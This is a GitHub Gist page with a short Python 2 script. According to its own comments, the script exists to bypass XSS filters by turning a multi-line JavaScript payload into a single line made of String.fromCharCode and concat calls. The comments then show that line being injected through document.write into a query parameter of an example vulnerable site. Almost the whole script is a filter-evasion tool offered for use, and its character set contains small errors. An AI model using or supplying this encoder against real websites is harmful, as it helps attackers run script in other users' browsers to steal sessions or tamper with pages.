Last active
April 16, 2024 02:50
-
-
Save YasserGersy/a0fee5ce7422a558c84bfd7790d8a082 to your computer and use it in GitHub Desktop.
javascript mutil lines payload into one line
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #The main purpose is to bypass xss filters and execute multi lines payload | |
| #write your payload to a file.txt | |
| #run the script and pass the file as argument | |
| # $python js2S.py file.txt | |
| # copy the output and pass the output paylad to a javascript function document.write or eval ,, etc , | |
| #for example , http://vuln2-xss.com/?name=document.write(__output__) | |
| #if any character from the following is filtered , remove it. | |
| import sys,os | |
| path=sys.argv[1] | |
| lines='' | |
| alph='abcdefghiijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWxyz0123456789' | |
| if os.path.isfile(path): | |
| lines=open(path,'r').read() | |
| else: | |
| lines=path | |
| last=False | |
| ndata="''.concat(" | |
| for l in lines: | |
| if len(l)<1: | |
| continue | |
| legal=l in alph | |
| asc=ord(l) | |
| if legal and last: | |
| ndata=ndata+l | |
| elif legal and not last: | |
| ndata=ndata+")).concat('"+l | |
| elif last and not legal: | |
| ndata=ndata+"').concat(String.fromCharCode("+str(asc) | |
| else: | |
| ndata=ndata+')).concat(String.fromCharCode('+str(asc) | |
| last=legal | |
| print "''"+ndata[12:]+'))' | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment